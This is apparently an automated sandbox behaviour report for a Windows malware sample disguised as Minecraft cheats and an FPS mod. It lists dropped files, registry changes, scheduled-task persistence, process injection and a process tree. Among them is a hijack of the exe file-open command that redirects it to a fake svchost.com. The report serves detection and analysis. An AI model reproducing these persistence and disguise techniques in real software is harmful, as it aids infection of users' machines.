File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\svchost.com	cheats.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	cheats.exe
File opened for modification	C:\Windows\svchost.com	cheats.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	cheats.exe
File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\svchost.com	cheats.exe
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\svchost.com	cheats.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com
File opened for modification	C:\Windows\svchost.com	cheats.exe
File opened for modification	C:\Windows\directx.sys	cheats.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cheats.execheats.execheats.execheats.execheats.execheats.exe6812964531.exesvchost.comsvchost.comsvchost.comsvchost.comcheats.exesvchost.comcheats.exesvchost.comsvchost.comcheats.execheats.exesvchost.comcheats.exesvchost.comsvchost.comsvchost.comcheats.exesvchost.comcheats.execheats.execmd.execheats.execheats.exesvchost.comStart.exesvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comcheats.exesvchost.comsvchost.comcheats.execheats.exe3mb_online_install.exesvchost.comsvchost.comsvchost.comcheats.exesvchost.comWScript.execheats.exesvchost.comcheats.exesvchost.comsvchost.comcheats.execheats.exesvchost.comsvchost.comcheats.execheats.execheats.execheats.execheats.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6812964531.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Start.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3mb_online_install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cheats.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Modifies registry class 64 IoCs

Processes:

cheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.exe._cache_minecraftfpsmod.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.exeBridgesurrogate.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.exe._cache_Synaptics.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.execheats.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	._cache_minecraftfpsmod.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	Bridgesurrogate.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	._cache_Synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	cheats.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 19 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

Processes:

pid	process
4276	schtasks.exe
3316	schtasks.exe
208	schtasks.exe
876	schtasks.exe
4004	schtasks.exe
3508	schtasks.exe
2848	schtasks.exe
228	schtasks.exe
2332	schtasks.exe
4912	schtasks.exe
4276	schtasks.exe
1520	schtasks.exe
5040	schtasks.exe
4852	schtasks.exe
624	schtasks.exe
4436	schtasks.exe
2560	schtasks.exe
684	schtasks.exe
1036	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

660 EXCEL.EXE

pid	process
660	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Bridgesurrogate.exepowershell.exepowershell.exe

pid	process
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3460	Bridgesurrogate.exe
3740	powershell.exe
3740	powershell.exe
3012	powershell.exe
3012	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	1976	WMIC.exe
Token: SeSecurityPrivilege	1976	WMIC.exe
Token: SeTakeOwnershipPrivilege	1976	WMIC.exe
Token: SeLoadDriverPrivilege	1976	WMIC.exe
Token: SeSystemProfilePrivilege	1976	WMIC.exe
Token: SeSystemtimePrivilege	1976	WMIC.exe
Token: SeProfSingleProcessPrivilege	1976	WMIC.exe
Token: SeIncBasePriorityPrivilege	1976	WMIC.exe
Token: SeCreatePagefilePrivilege	1976	WMIC.exe
Token: SeBackupPrivilege	1976	WMIC.exe
Token: SeRestorePrivilege	1976	WMIC.exe
Token: SeShutdownPrivilege	1976	WMIC.exe
Token: SeDebugPrivilege	1976	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1976	WMIC.exe
Token: SeRemoteShutdownPrivilege	1976	WMIC.exe
Token: SeUndockPrivilege	1976	WMIC.exe
Token: SeManageVolumePrivilege	1976	WMIC.exe
Token: 33	1976	WMIC.exe
Token: 34	1976	WMIC.exe
Token: 35	1976	WMIC.exe
Token: 36	1976	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1976	WMIC.exe
Token: SeSecurityPrivilege	1976	WMIC.exe
Token: SeTakeOwnershipPrivilege	1976	WMIC.exe
Token: SeLoadDriverPrivilege	1976	WMIC.exe
Token: SeSystemProfilePrivilege	1976	WMIC.exe
Token: SeSystemtimePrivilege	1976	WMIC.exe
Token: SeProfSingleProcessPrivilege	1976	WMIC.exe
Token: SeIncBasePriorityPrivilege	1976	WMIC.exe
Token: SeCreatePagefilePrivilege	1976	WMIC.exe
Token: SeBackupPrivilege	1976	WMIC.exe
Token: SeRestorePrivilege	1976	WMIC.exe
Token: SeShutdownPrivilege	1976	WMIC.exe
Token: SeDebugPrivilege	1976	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1976	WMIC.exe
Token: SeRemoteShutdownPrivilege	1976	WMIC.exe
Token: SeUndockPrivilege	1976	WMIC.exe
Token: SeManageVolumePrivilege	1976	WMIC.exe
Token: 33	1976	WMIC.exe
Token: 34	1976	WMIC.exe
Token: 35	1976	WMIC.exe
Token: 36	1976	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2020	WMIC.exe
Token: SeSecurityPrivilege	2020	WMIC.exe
Token: SeTakeOwnershipPrivilege	2020	WMIC.exe
Token: SeLoadDriverPrivilege	2020	WMIC.exe
Token: SeSystemProfilePrivilege	2020	WMIC.exe
Token: SeSystemtimePrivilege	2020	WMIC.exe
Token: SeProfSingleProcessPrivilege	2020	WMIC.exe
Token: SeIncBasePriorityPrivilege	2020	WMIC.exe
Token: SeCreatePagefilePrivilege	2020	WMIC.exe
Token: SeBackupPrivilege	2020	WMIC.exe
Token: SeRestorePrivilege	2020	WMIC.exe
Token: SeShutdownPrivilege	2020	WMIC.exe
Token: SeDebugPrivilege	2020	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2020	WMIC.exe
Token: SeRemoteShutdownPrivilege	2020	WMIC.exe
Token: SeUndockPrivilege	2020	WMIC.exe
Token: SeManageVolumePrivilege	2020	WMIC.exe
Token: 33	2020	WMIC.exe
Token: 34	2020	WMIC.exe
Token: 35	2020	WMIC.exe
Token: 36	2020	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2020	WMIC.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

java.exejavaw.exeStart.execurl.exeEXCEL.EXE

pid	process
4820	java.exe
3208	javaw.exe
4856	Start.exe
1508	curl.exe
660	EXCEL.EXE
660	EXCEL.EXE
660	EXCEL.EXE
660	EXCEL.EXE
660	EXCEL.EXE
660	EXCEL.EXE
660	EXCEL.EXE
660	EXCEL.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6812964531.exejavaw.exejava.execmd.execmd.exejavaw.execmd.execmd.exe3mb_online_install.exeStart.execmd.execheats.execheats.exesvchost.comcheat.execheats.exesvchost.comminecraftfpsmod.execheats.exesvchost.com

description	pid	process	target process
PID 4060 wrote to memory of 2768	4060	6812964531.exe	javaw.exe
PID 4060 wrote to memory of 2768	4060	6812964531.exe	javaw.exe
PID 2768 wrote to memory of 4820	2768	javaw.exe	java.exe
PID 2768 wrote to memory of 4820	2768	javaw.exe	java.exe
PID 4820 wrote to memory of 3744	4820	java.exe	cmd.exe
PID 4820 wrote to memory of 3744	4820	java.exe	cmd.exe
PID 3744 wrote to memory of 3096	3744	cmd.exe	cacls.exe
PID 3744 wrote to memory of 3096	3744	cmd.exe	cacls.exe
PID 4820 wrote to memory of 3928	4820	java.exe	cmd.exe
PID 4820 wrote to memory of 3928	4820	java.exe	cmd.exe
PID 3928 wrote to memory of 4004	3928	cmd.exe	schtasks.exe
PID 3928 wrote to memory of 4004	3928	cmd.exe	schtasks.exe
PID 4820 wrote to memory of 3208	4820	java.exe	javaw.exe
PID 4820 wrote to memory of 3208	4820	java.exe	javaw.exe
PID 3208 wrote to memory of 3128	3208	javaw.exe	cmd.exe
PID 3208 wrote to memory of 3128	3208	javaw.exe	cmd.exe
PID 3128 wrote to memory of 1976	3128	cmd.exe	WMIC.exe
PID 3128 wrote to memory of 1976	3128	cmd.exe	WMIC.exe
PID 3208 wrote to memory of 4088	3208	javaw.exe	cmd.exe
PID 3208 wrote to memory of 4088	3208	javaw.exe	cmd.exe
PID 4088 wrote to memory of 2020	4088	cmd.exe	WMIC.exe
PID 4088 wrote to memory of 2020	4088	cmd.exe	WMIC.exe
PID 3208 wrote to memory of 2316	3208	javaw.exe	3mb_online_install.exe
PID 3208 wrote to memory of 2316	3208	javaw.exe	3mb_online_install.exe
PID 3208 wrote to memory of 2316	3208	javaw.exe	3mb_online_install.exe
PID 2316 wrote to memory of 4856	2316	3mb_online_install.exe	Start.exe
PID 2316 wrote to memory of 4856	2316	3mb_online_install.exe	Start.exe
PID 2316 wrote to memory of 4856	2316	3mb_online_install.exe	Start.exe
PID 4856 wrote to memory of 1636	4856	Start.exe	cmd.exe
PID 4856 wrote to memory of 1636	4856	Start.exe	cmd.exe
PID 1636 wrote to memory of 1508	1636	cmd.exe	curl.exe
PID 1636 wrote to memory of 1508	1636	cmd.exe	curl.exe
PID 3208 wrote to memory of 1212	3208	javaw.exe	cheats.exe
PID 3208 wrote to memory of 1212	3208	javaw.exe	cheats.exe
PID 3208 wrote to memory of 1212	3208	javaw.exe	cheats.exe
PID 3208 wrote to memory of 2792	3208	javaw.exe	minecraftfpsmod.exe
PID 3208 wrote to memory of 2792	3208	javaw.exe	minecraftfpsmod.exe
PID 3208 wrote to memory of 2792	3208	javaw.exe	minecraftfpsmod.exe
PID 3208 wrote to memory of 3740	3208	javaw.exe	cheat.exe
PID 3208 wrote to memory of 3740	3208	javaw.exe	cheat.exe
PID 1212 wrote to memory of 3640	1212	cheats.exe	cheats.exe
PID 1212 wrote to memory of 3640	1212	cheats.exe	cheats.exe
PID 1212 wrote to memory of 3640	1212	cheats.exe	cheats.exe
PID 3640 wrote to memory of 2736	3640	cheats.exe	svchost.com
PID 3640 wrote to memory of 2736	3640	cheats.exe	svchost.com
PID 3640 wrote to memory of 2736	3640	cheats.exe	svchost.com
PID 2736 wrote to memory of 3452	2736	svchost.com	cheats.exe
PID 2736 wrote to memory of 3452	2736	svchost.com	cheats.exe
PID 2736 wrote to memory of 3452	2736	svchost.com	cheats.exe
PID 3740 wrote to memory of 1792	3740	cheat.exe	wmic.exe
PID 3740 wrote to memory of 1792	3740	cheat.exe	wmic.exe
PID 3452 wrote to memory of 3460	3452	cheats.exe	Bridgesurrogate.exe
PID 3452 wrote to memory of 3460	3452	cheats.exe	Bridgesurrogate.exe
PID 3452 wrote to memory of 3460	3452	cheats.exe	Bridgesurrogate.exe
PID 3460 wrote to memory of 3944	3460	svchost.com	cheats.exe
PID 3460 wrote to memory of 3944	3460	svchost.com	cheats.exe
PID 3460 wrote to memory of 3944	3460	svchost.com	cheats.exe
PID 2792 wrote to memory of 1172	2792	minecraftfpsmod.exe	._cache_minecraftfpsmod.exe
PID 2792 wrote to memory of 1172	2792	minecraftfpsmod.exe	._cache_minecraftfpsmod.exe
PID 2792 wrote to memory of 1172	2792	minecraftfpsmod.exe	._cache_minecraftfpsmod.exe
PID 3944 wrote to memory of 2832	3944	cheats.exe	svchost.com
PID 3944 wrote to memory of 2832	3944	cheats.exe	svchost.com
PID 3944 wrote to memory of 2832	3944	cheats.exe	svchost.com
PID 2832 wrote to memory of 2724	2832	svchost.com	w32tm.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\6812964531.exe
"C:\Users\Admin\AppData\Local\Temp\6812964531.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4060
- C:\Program Files\Java\jre-1.8\bin\javaw.exe
